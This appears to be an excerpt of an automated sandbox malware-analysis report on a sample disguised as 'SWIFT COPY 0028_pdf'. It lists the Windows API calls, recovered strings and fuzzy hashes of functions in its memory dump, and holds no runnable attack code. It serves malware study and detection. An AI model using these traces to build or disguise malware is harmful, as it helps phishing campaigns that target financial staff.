                                                                                    • DestroyWindow.USER32(?), ref: 0098D042
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00920000,00000000), ref: 0098D075
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098D094
                                                                                    • GetDesktopWindow.USER32 ref: 0098D0A9
                                                                                    • GetWindowRect.USER32(00000000), ref: 0098D0B0
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0098D0C2
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0098D0DA
                                                                                      • Part of subcall function 0093B526: GetWindowLongW.USER32(?,000000EB), ref: 0093B537
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 3877571568-3619404913
                                                                                    • Opcode ID: 4ff99bf2aab2421d7d5bc2b5679db0e2eec945ac19fd5b225ddb87553848cf14
                                                                                    • Instruction ID: 232782ace80b085a3ffd0e29e93f5d01641b4024aee7171a757cbd7c8e635dda
                                                                                    • Opcode Fuzzy Hash: 4ff99bf2aab2421d7d5bc2b5679db0e2eec945ac19fd5b225ddb87553848cf14
                                                                                    • Instruction Fuzzy Hash: CD71CBB0154345AFEB24DF28CC84FA63BE9EB89708F44451DF9858B3A1D730E842DB62
                                                                                    Function 0098F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0098F37A
                                                                                      • Part of subcall function 0098D7DE: ClientToScreen.USER32(?,?), ref: 0098D807
                                                                                      • Part of subcall function 0098D7DE: GetWindowRect.USER32(?,?), ref: 0098D87D
                                                                                      • Part of subcall function 0098D7DE: PtInRect.USER32(?,?,0098ED5A), ref: 0098D88D
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098F3E3
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0098F3EE
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0098F411
                                                                                    • _wcscat.LIBCMT ref: 0098F441
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0098F458
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0098F471
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0098F488
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0098F4AA
                                                                                    • DragFinish.SHELL32(?), ref: 0098F4B1
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0098F59C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 23b66ab14463beb881afb5a5a47c0083f1fdf1a4a02dce133ed51558845b1b70
                                                                                    • Instruction ID: 5683d8b2a5955bf59b216ded382f06893aeac03f8338857fb39fb974f399fce5
                                                                                    • Opcode Fuzzy Hash: 23b66ab14463beb881afb5a5a47c0083f1fdf1a4a02dce133ed51558845b1b70
                                                                                    • Instruction Fuzzy Hash: 95613871109300AFC711EF64DC85EAFBBE8EFD9714F004A1EF595962A1DB709A09CB92
                                                                                    Function 0096AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0096AB3D
                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0096AB46
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AB52
                                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0096AC40
                                                                                    • __swprintf.LIBCMT ref: 0096AC70
                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0096AC9C
                                                                                    • VariantInit.OLEAUT32(?), ref: 0096AD4D
                                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0096ADDF
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AE35
                                                                                    • VariantClear.OLEAUT32(?), ref: 0096AE44
                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0096AE80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                    • API String ID: 3730832054-3931177956
                                                                                    • Opcode ID: 75a74d593dd24ae32d512be9f77878d008897f98234485def51e8cabe511f1fd
                                                                                    • Instruction ID: 9e4d010f8480180f703e964c67e7519533e9be47af9e4781620137123e96fad2
                                                                                    • Opcode Fuzzy Hash: 75a74d593dd24ae32d512be9f77878d008897f98234485def51e8cabe511f1fd
                                                                                    • Instruction Fuzzy Hash: 03D1FE71A04215EFCB209F65D895BAEF7B9FF49700F148865E405AB190DB78EC40EFA2
                                                                                    Function 0098716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 009871FC
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00987247
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 693246d9efe0f92a2c25bf1662c2cb515244c2ca57c603096b4fd18db99b7a71
                                                                                    • Instruction ID: 08ea5e9b2966b31c42cb1a8b7ab95d616e469ca850b2653f826272fd750183ab
                                                                                    • Opcode Fuzzy Hash: 693246d9efe0f92a2c25bf1662c2cb515244c2ca57c603096b4fd18db99b7a71
                                                                                    • Instruction Fuzzy Hash: E3916B742087019FCB14FF60D851B6EB7A6AF94310F108859F8966B3A3DB34ED4ADB91
                                                                                    Function 0098E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0098E5AB
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0098BEAF), ref: 0098E607
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E647
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E68C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0098E6C3
                                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0098BEAF), ref: 0098E6CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0098E6DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,0098BEAF), ref: 0098E6EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0098E70B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0098E717
                                                                                      • Part of subcall function 00940FA7: __wcsicmp_l.LIBCMT ref: 00941030
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: 50f5d51aba55116a79a27eb541a0382edb86b7adc83cfe3d239031fec5119ec1
                                                                                    • Instruction ID: 235fbd15617dc145df4c0494c8ef611c2cd9e0d6c9b62b91a3d56dc9e9c7a100
                                                                                    • Opcode Fuzzy Hash: 50f5d51aba55116a79a27eb541a0382edb86b7adc83cfe3d239031fec5119ec1
                                                                                    • Instruction Fuzzy Hash: 2E61CF71510215BAEB14EF64CC86FAE7BACBF18714F104515F911E62D0EB74D980CBA0
                                                                                    Function 0096D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0092936C: __swprintf.LIBCMT ref: 009293AB
                                                                                      • Part of subcall function 0092936C: __itow.LIBCMT ref: 009293DF
                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0096D292
                                                                                    • GetDriveTypeW.KERNEL32 ref: 0096D2DF
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D327
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D35E
                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0096D38C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                    • API String ID: 1148790751-4113822522
                                                                                    • Opcode ID: 9cb37586312c0933a5d28bceef507151bd2493963ccb965d3c5b08e4b2f4086d
                                                                                    • Instruction ID: bd984e2d4ca301bcde98df7b26531051a6f28a1ccae826bc668cd6ad39c362fa
                                                                                    • Opcode Fuzzy Hash: 9cb37586312c0933a5d28bceef507151bd2493963ccb965d3c5b08e4b2f4086d
                                                                                    • Instruction Fuzzy Hash: 9F513D716043159FC700EF10D991A6EB7E8FF98758F10886DF896A72A1DB31EE05CB92
                                                                                    Function 009626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00993973,00000016,0000138C,00000016,?,00000016,009BDDB4,00000000,?), ref: 009626F1
                                                                                    • LoadStringW.USER32(00000000,?,00993973,00000016), ref: 009626FA
                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00993973,00000016,0000138C,00000016,?,00000016,009BDDB4,00000000,?,00000016), ref: 0096271C
                                                                                    • LoadStringW.USER32(00000000,?,00993973,00000016), ref: 0096271F
                                                                                    • __swprintf.LIBCMT ref: 0096276F
                                                                                    • __swprintf.LIBCMT ref: 00962780
                                                                                    • _wprintf.LIBCMT ref: 00962829
                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00962840
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                    • API String ID: 618562835-2268648507
                                                                                    • Opcode ID: b2bc33770a9fe907ac664c535fad83f4a977ced4c8fdd6eb2a521524982d39d0
                                                                                    • Instruction ID: a452a09cdfb8ed5be6629ad5a087e20910e248e61494cce97f43f2e318c5c793
                                                                                    • Opcode Fuzzy Hash: b2bc33770a9fe907ac664c535fad83f4a977ced4c8fdd6eb2a521524982d39d0
                                                                                    • Instruction Fuzzy Hash: CB416F72804229BACB14FBE0ED86FEEB778AF94344F104065B50177096EA746F59CBA1
                                                                                    Function 0096D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0096D0D8
                                                                                    • __swprintf.LIBCMT ref: 0096D0FA
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0096D137
                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0096D15C
                                                                                    • _memset.LIBCMT ref: 0096D17B
                                                                                    • _wcsncpy.LIBCMT ref: 0096D1B7
                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0096D1EC
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096D1F7
                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0096D200
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0096D20A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                    • String ID: :$\$\??\%s
                                                                                    • API String ID: 2733774712-3457252023
                                                                                    • Opcode ID: 8bb5353f1628dc53d408a83cee6791128234c7b27e373a92c8b059a5c7faea17
                                                                                    • Instruction ID: 561d0b8439d16a37f5670318b46245e15006c1ad451ed12c1f5eb89e40400406
                                                                                    • Opcode Fuzzy Hash: 8bb5353f1628dc53d408a83cee6791128234c7b27e373a92c8b059a5c7faea17
                                                                                    • Instruction Fuzzy Hash: 8731B2B2A14109ABDB21DFA0CC49FEF37BCEF89740F1040B6FA19D2160EB7096448B64
                                                                                    Function 0098E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0098BEF4,?,?), ref: 0098E754
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E76B
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E776
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E783
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0098E78C
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E79B
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0098E7A4
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E7AB
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0098BEF4,?,?,00000000,?), ref: 0098E7BC
                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,009AD9BC,?), ref: 0098E7D5
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0098E7E5
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0098E809
                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0098E834
                                                                                    • DeleteObject.GDI32(00000000), ref: 0098E85C
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0098E872
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 3840717409-0
                                                                                    • Opcode ID: 235609b15b7b83f56775f1a498413e484c41a36282766c3c12f90762ca6506a5
                                                                                    • Instruction ID: 24f956f5072c352c7bb5ad25afbfe23505742fe70445ce98b3e575aa5367accf
                                                                                    • Opcode Fuzzy Hash: 235609b15b7b83f56775f1a498413e484c41a36282766c3c12f90762ca6506a5
                                                                                    • Instruction Fuzzy Hash: 85414975601204EFDB119F65CC88EAE7BB9EF8A715F108058F906D7260D7309D41EBA0
                                                                                    Function 009705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __wsplitpath.LIBCMT ref: 0097076F
                                                                                    • _wcscat.LIBCMT ref: 00970787
                                                                                    • _wcscat.LIBCMT ref: 00970799
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 009707AE
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009707C2
                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 009707DA
                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 009707F4
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00970806
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                    • String ID: *.*
                                                                                    • API String ID: 34673085-438819550
                                                                                    • Opcode ID: f8fd577bb8d0776151d34b179a813de2f14fa7aac9506882fa7f0af712336189
                                                                                    • Instruction ID: 859d696495983b82aaab9ff38b86206ab02ced4ec79513d82fb429f083fda72c
                                                                                    • Opcode Fuzzy Hash: f8fd577bb8d0776151d34b179a813de2f14fa7aac9506882fa7f0af712336189
                                                                                    • Instruction Fuzzy Hash: CF817F72504301DFCB24EF24C855AAEB7E8BBC8304F148D2EF889D7251EA34E9548B92
                                                                                    Function 0098EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093B34E: GetWindowLongW.USER32(?,000000EB), ref: 0093B35F
                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0098EF3B
                                                                                    • GetFocus.USER32 ref: 0098EF4B
                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0098EF56
                                                                                    • _memset.LIBCMT ref: 0098F081
                                                                                    • GetMenuItemInfoW.USER32 ref: 0098F0AC
                                                                                    • GetMenuItemCount.USER32(00000000), ref: 0098F0CC
                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0098F0DF
                                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0098F113
                                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0098F15B
                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098F193
                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0098F1C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                    • String ID: 0
                                                                                    • API String ID: 1296962147-4108050209
                                                                                    • Opcode ID: eef35bc7e0d3fac177c2391671f398150cb223a6a0ef22887158341018e69943
                                                                                    • Instruction ID: 48cc3b2925fa1bea48236f0d3eb7a9eca5ee9c3934cb16bc1942121f14cb2ed9
                                                                                    • Opcode Fuzzy Hash: eef35bc7e0d3fac177c2391671f398150cb223a6a0ef22887158341018e69943
                                                                                    • Instruction Fuzzy Hash: 82818D71609301AFDB20EF14C898A6BBBE9FF89714F00592EF99597391D730D905CBA2
                                                                                    Function 0095A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0095ABD7
                                                                                      • Part of subcall function 0095ABBB: GetLastError.KERNEL32(?,0095A69F,?,?,?), ref: 0095ABE1
                                                                                      • Part of subcall function 0095ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0095A69F,?,?,?), ref: 0095ABF0
                                                                                      • Part of subcall function 0095ABBB: HeapAlloc.KERNEL32(00000000,?,0095A69F,?,?,?), ref: 0095ABF7
                                                                                      • Part of subcall function 0095ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0095AC0E
                                                                                      • Part of subcall function 0095AC56: GetProcessHeap.KERNEL32(00000008,0095A6B5,00000000,00000000,?,0095A6B5,?), ref: 0095AC62
                                                                                      • Part of subcall function 0095AC56: HeapAlloc.KERNEL32(00000000,?,0095A6B5,?), ref: 0095AC69
                                                                                      • Part of subcall function 0095AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0095A6B5,?), ref: 0095AC7A
                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0095A8CB
                                                                                    • _memset.LIBCMT ref: 0095A8E0
